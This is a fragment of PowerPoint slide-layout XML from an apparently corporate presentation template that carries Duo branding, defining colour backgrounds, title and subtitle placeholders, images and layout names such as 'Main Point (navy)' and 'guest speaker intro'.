        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602565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5" name="Google Shape;695;p104"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601890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6" name="Google Shape;696;p10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97" name="Google Shape;697;p104"/>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E7 - Numbers (3 large, title)">
  <p:cSld name="BIG_NUMBER_1_1_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 698"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699" name="Google Shape;699;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59250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0" name="Google Shape;700;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58575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01" name="Google Shape;701;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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2" name="Google Shape;702;p10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03" name="Google Shape;703;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3309075"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05"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302325"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05" name="Google Shape;705;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602565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6" name="Google Shape;706;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601890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07" name="Google Shape;707;p10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08" name="Google Shape;708;p105"/>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E8 - Numbers (3 large, pattern">
  <p:cSld name="CUSTOM_11">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 709"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="710" name="Google Shape;710;p106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6261325"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711" name="Google Shape;711;p106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3446413"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712" name="Google Shape;712;p106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631525"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713" name="Google Shape;713;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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4" name="Google Shape;714;p106"/>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715" name="Google Shape;715;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634900"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6" name="Google Shape;716;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628150"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17" name="Google Shape;717;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3451488"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8" name="Google Shape;718;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3444737"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19" name="Google Shape;719;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6268088"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0" name="Google Shape;720;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6261337"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21" name="Google Shape;721;p10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22" name="Google Shape;722;p106"/>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 - Main Point (green)" type="blank">
  <p:cSld name="BLANK">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 723"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="724" name="Google Shape;724;p107"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271025"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5" name="Google Shape;725;p107"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26" name="Google Shape;726;p10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27" name="Google Shape;727;p107"/>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6 - Subtitle (no details, navy)">
  <p:cSld name="CUSTOM_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 728"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="729" name="Google Shape;729;p108"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30" name="Google Shape;730;p10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731" name="Google Shape;731;p108"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122775" y="4700875"/>
            <a:ext cx="984229" cy="177775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732" name="Google Shape;732;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3 - Main point (navy)">
  <p:cSld name="BLANK_4">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 733"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="Google Shape;734;p109"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242450"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5" name="Google Shape;735;p109"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36" name="Google Shape;736;p10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37" name="Google Shape;737;p109"/>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4 - Main Point (green, details)">
  <p:cSld name="BLANK_3">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 738"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="739" name="Google Shape;739;p11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40" name="Google Shape;740;p110"/>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110"/>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363F44"/>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42" name="Google Shape;742;p11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43" name="Google Shape;743;p110"/>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5 - Main Point (navy, details)">
  <p:cSld name="BLANK_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 744"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="745" name="Google Shape;745;p11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46" name="Google Shape;746;p111"/>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111"/>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48" name="Google Shape;748;p11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49" name="Google Shape;749;p111"/>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Z1 - DO NOT USE - Blank">
  <p:cSld name="SECTION_HEADER_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 6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6 - Main Point (navy and green, details)">
  <p:cSld name="BLANK_2_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 750"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="751" name="Google Shape;751;p112"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52" name="Google Shape;752;p112"/>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6BBF4E"/>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112"/>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54" name="Google Shape;754;p11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55" name="Google Shape;755;p112"/>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7 - Main Point (green and navy, details)">
  <p:cSld name="BLANK_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 756"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="Google Shape;757;p113"/>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363F44"/>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113"/>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759" name="Google Shape;759;p113"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60" name="Google Shape;760;p11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61" name="Google Shape;761;p113"/>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8 - Main Point (large text green)">
  <p:cSld name="BLANK_5">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 762"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763" name="Google Shape;763;p114"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271025"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11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9 - Main Point (large text navy)">
  <p:cSld name="BLANK_4_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 765"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766" name="Google Shape;766;p115"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242450"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11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Y2 - Transition image (mission control)">
  <p:cSld name="CUSTOM_5">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 768"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="769" name="Google Shape;769;p116"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="13517"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="770" name="Google Shape;770;p116"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771" name="Google Shape;771;p11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72" name="Google Shape;772;p116"/>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2 - Image only (Kickoff 2018)">
  <p:cSld name="CUSTOM_5_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 773"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="774" name="Google Shape;774;p117"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="10820" r="10828"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-28675" y="-14325"/>
            <a:ext cx="9201348" cy="5188299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="775" name="Google Shape;775;p117"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776" name="Google Shape;776;p11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77" name="Google Shape;777;p117"/>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3 - Graphics only (blank paper)">
  <p:cSld name="CUSTOM_5_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 778"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="779" name="Google Shape;779;p118"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780" name="Google Shape;780;p11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81" name="Google Shape;781;p118"/>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Z2 - DO NOT USE - Blank">
  <p:cSld name="BLANK_6">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 782"/>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D4 - White logo (use over background image)">
  <p:cSld name="CUSTOM_12">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 783"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="784" name="Google Shape;784;p12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85" name="Google Shape;785;p12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86" name="Google Shape;786;p120"/>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7 - Subtitle (guest speaker intro)">
  <p:cSld name="CUSTOM_6">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 787"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="788" name="Google Shape;788;p12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789" name="Google Shape;789;p121"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-753144" y="-2335759"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="790" name="Google Shape;790;p121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3358774" y="5752888"/>
            <a:ext cx="9371125" cy="1938650"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInputOutpu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21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018950" y="-419100"/>
            <a:ext cx="1319700" cy="1319700"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="152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21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242450" y="776875"/>
            <a:ext cx="6615600" cy="2701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121"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296450" y="3478375"/>
            <a:ext cx="76920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6BBF4E"/>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94" name="Google Shape;794;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4083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795" name="Google Shape;795;p121"/>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1 - Main Point (office)">
  <p:cSld name="SECTION_HEADER_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 67"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68" name="Google Shape;68;p13" descr="Product Shot w2FA_7.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="5896" b="6230"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="25"/>
            <a:ext cx="9143999" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="Google Shape;69;p13"/>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70" name="Google Shape;70;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2035650" y="1877700"/>
            <a:ext cx="5211900" cy="1175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 name="Google Shape;71;p13"/>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72" name="Google Shape;72;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51507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3" name="Google Shape;73;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7064700" y="4700875"/>
            <a:ext cx="984229" cy="17777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A5 - Title (green graphics 1, details)">
  <p:cSld name="CUSTOM_7">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 796"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Google Shape;797;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6670275" y="3177625"/>
            <a:ext cx="2368200" cy="236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8" name="Google Shape;798;p122"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3821850" y="2028800"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="799" name="Google Shape;799;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5141600" y="-12"/>
            <a:ext cx="9371125" cy="19386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122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="149150" y="-332675"/>
            <a:ext cx="2884114" cy="567900"/>
            <a:chOff x="-162300" y="-235325"/>
            <a:chExt cx="2884114" cy="567900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="801" name="Google Shape;801;p122"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-16230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22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="60978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22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1381859"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22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2153914"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122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242450" y="347875"/>
            <a:ext cx="6615600" cy="2609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6" name="Google Shape;806;p122" descr="Duo Logo White@2x.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="398750" y="4167425"/>
            <a:ext cx="1527349" cy="494875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="807" name="Google Shape;807;p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="2816825"/>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3F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="363F4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08" name="Google Shape;808;p122"/>
